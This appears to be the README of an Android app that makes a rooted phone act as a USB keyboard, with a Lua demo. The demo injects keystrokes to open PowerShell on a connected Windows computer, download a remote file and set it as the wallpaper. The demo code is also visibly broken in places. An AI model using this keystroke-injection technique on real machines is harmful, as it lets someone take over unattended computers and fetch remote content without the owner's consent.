Use at your own risk. For educational purposes only.
An Android app that provides a simple Lua interface for enumerating and interfacing with arbitrary composite USB devices.
Root access is required.
The best way to explain what this app does is with a code example. The following script does the following when interpreted by this app:
- Configures your phone to become a USB keyboard
- Sends a series of key presses to the computer your phone is plugged in to, changing its wallpaper
-- create a USB composite device composed of a single keyboard
usb = luausb.create({ id = 0, type = "keyboard" })
kb =[1]
local file = ""
while true do
-- wait for the phone to be plugged into a computer
while not kb.test() do usb.delay(1000) end
kb.press_keys(kb.LSUPER, kb.R) -- open the Windows run dialog
usb.delay(2000) -- wait 2 seconds
kb.send_string("powershell\n") -- pop open a powershell window
-- enter a script that changes your wallpaper
kb.send_string("[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;" ..
"(new-object System.Net.WebClient).DownloadFile('" .. file .. "',\"$Env:Temp\\b.jpg\");\n" ..
"Add-Type @\"\n" ..
"using System;using System.Runtime.InteropServices;using Microsoft.Win32;namespa" ..
"ce W{public class S{ [DllImport(\"user32.dll\")]static extern int SystemParamet" ..
"ersInfo(int a,int b,string c,int d);public static void SW(string a){SystemParam" ..
"etersInfo(20,0,a,3);RegistryKey c=Registry.CurrentUser.OpenSubKey(\"Control Pan" ..
"el\\\\Desktop\",true);c.SetValue(@\"WallpaperStyle\", \"2\");c.SetValue(@\"Tile" ..
"Wallpaper\", \"0\");c.Close();}}}\n" ..
"\"@\n" ..
"[W.S]::SW(\"$Env:Temp\\b.jpg\")\n" ..
-- wait for the phone to be unplugged
while kb.test() do usb.delay(1000) end
This app will not work on every Android device. If your Android OS has Linux Kernel version >= 3.18 and is compiled with configfs and f_hid, then the app can try to create usb gadgets.
New demo applications can be added to assets/scripts
. The API is pretty much self-documenting,
just look at the existing demos to get a feel for how the API works.